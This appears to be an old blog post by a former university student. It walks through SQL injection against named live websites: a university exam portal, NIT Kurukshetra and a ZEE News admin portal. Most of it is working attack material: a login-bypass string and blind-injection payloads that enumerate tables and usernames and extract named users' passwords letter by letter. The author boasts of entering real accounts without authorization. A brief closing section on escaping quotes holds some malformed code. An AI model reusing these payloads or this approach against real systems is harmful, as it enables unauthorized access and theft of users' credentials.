Hi Readers, Today morning I received an email regarding SQL injection vulnerability. The email was from
PROHACK. Actually I have subscribed its news letter. Every thing was normal except one thing.....and that was Punjab Technical University (PTU) is hackable very easily.
Actually I am a former PTU student so I have emotional touch with my UNI. I have gone thro the post and decided to check whether this is really possible or not. While googling I found that PTU Jalandhar Website XSS Vulnerability already been exploited by Mr. Ajay Pal Singh Atwal on May 29, 2006.
WTF...!!! Its being almost more then 3 years and still any average hacker can login into the website.
Where are the official authorities of PTU ???? Still after 3 years the government is sleeping. I finally decided to post this article along with the screen shoots so that some will hear the voice and fix the vulnerablities.
The first step which I have taken is to inform Registrar Mr.S. H.S. Bains and Deputy Registrar Mr.Er.S.S.Walia. Below are the screen shots of their official email ID and my email, which I sent to them.
Now lets begin step by step...how to hack websites using SQL Injection Vulnerability. Note that this is for educational purpose and if anybody use this to hack any website, I promise not to prosecute. In many countries it is illegal to use this attack. Here I am not going to share the exact method I have followed, but I will share the steps for SQL injection. One can follow these steps to perform SQL Injection attack.
WARNING:
The official website for PTU is www.ptuexam.com . On the top right of this screen, you will see the login page. Now you have to use discover other users' passwords from here. The SQL Injection attack allows external users to read details from the database. In a well designed system this will only include data that is available to the public anyway.
How to Identify a Site Vulnerable to an SQL Injection Attack
- If a web page accepts text entry (for example a user name and password) then try entering a string that contains one single quote.
- A vulnerable site may behave oddly given this input. You may see an error message such as that shown:
By-Pass authentication using SQL Injection
Take a guess
- Before hacking the system, try to guess a user name and password. Unless you are very lucky you will not get into the system.To know more about PASSWORD GUESSING, CLICK HERE
Force an Error
- If you enter a string with a single quote in it such as O'Brien for either user name or password you will get a Software Error as the SQL is invalid and cannot be parsed.
Force Entry
- If you enter the string ' OR ''=' as both user name and password you can ensure that the WHERE clause always returns true. Without knowing any user names or passwords you can by-pass the log in screen. In this example you get the user name of the first person in the table.
The magic string works because it program evaluates:
SELECT name from users WHERE name='name' AND password='password'
as the 'always true' string:
SELECT name from users WHERE name='' OR ''='' AND password='' OR ''=''
Find Table Names using SQL Injection.
In which we discover the names of the tables available for viewing. The function DATABASE() will give you that value. When you know the name of the database being used you can take guesses at the names of the tables.
Does the current database contain the letter j?
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
Is there a table called one in database test?
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
Is there more than one table in the database(s) containing a j?
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
The below is the list of PTU students username and passwords.
Find a user names using SQL Injection:
You can only ask yes/no questions, but you can find out just about anything you want to with a little patience.
You use xx for the user name and enter the following as password:
Are there more than 10 rows in the password table?
' OR (SELECT COUNT(*) FROM users)>10 AND ''='
Is there a user with an r in his name?
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
Is there a user (other than ajaypal) with an a in his name?
' OR EXISTS(SELECT * FROM users WHERE name!='ajaypal' AND name LIKE '%a%') AND ''='
Find the below example, You can find other users on the system. We choose to get mandeep's password in the below string.
' OR EXISTS(SELECT * FROM users WHERE name='mandeep' AND password LIKE '%w%') AND ''='
Find a password. How to discover the password for a user if you know the name of the password table and a user account.
You can now get the system to answer questions about the password table. It will only ever answer yes (and let you in) or no (by refusing entry). Your questions must take the form of a valid SQL query. In each case use a
xx for the user name and the text shown as password. You can ask questions such as:
Does jake's password have a w in it?
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
Does jake's password start with w?
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'w%') AND ''='
Does jake's password have an w followed by d?
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='
Is the fourth letter of jake's password w?
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='
This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
Below is the login page for NIT Kurukshetra.
After getting my hands dirty with few SQL strings, I got access to the below account. I login and simply logged out without making any changes.
After this I move towards Official website of ZEE News Noida and got the access to below ADMIN portal. Here I got the access to all the accounts.
Below is the internal view of one account. I haven't make any change or even not tried to edit any information, but my motive is only to show that up to which extent one can enter into such a websites.
Websites which are vulnerable with same SQL Injection vulnerability are listed below:
Causes of and Cures for SQL Injection
The SQL Injection attack is possible when the programmers who write the code behind the page neglect to properly escape strings that are used in SQL queries.
Programs common build SQL queries such to check values. For example the SQL statement: will return one row if the given user/password combination exists in the table users.
SELECT name FROM users WHERE name='freehacking' AND password='website'
Of course the values freehacking and website are taken from values entered by the user. To build the SQL query the Perl programmer might use a line such as:
$sql = "SELECT name FROM users WHERE name='$Q::name' AND password='$Q::password'"
The VB programmer might use something like:
sql = "SELECT name FROM users WHERE name='" & name & "' AND '" & password & "'"
In both cases the sql string generated will be invalid SQL if the variable name contains a single quote.
Worse, a sneaky user might enter a string that results in valid SQL, but SQL that generates unexpected reults.
Cures
The cure is simply to escape single quotes properly. In most cases that mean substitute a single quote with two single quotes. In Perl you could use:
$sql = sprintf 'SELECT name FROM users WHERE name=%s AND password=%s,
$dbh->quote($Q::name),$dbh->quote($Q::password);
In VB you could use:
sql = "SELECT name FROM users WHERE name='" & replace(name,"'","''") & _
"' AND password='" & replace(password,"'","''")
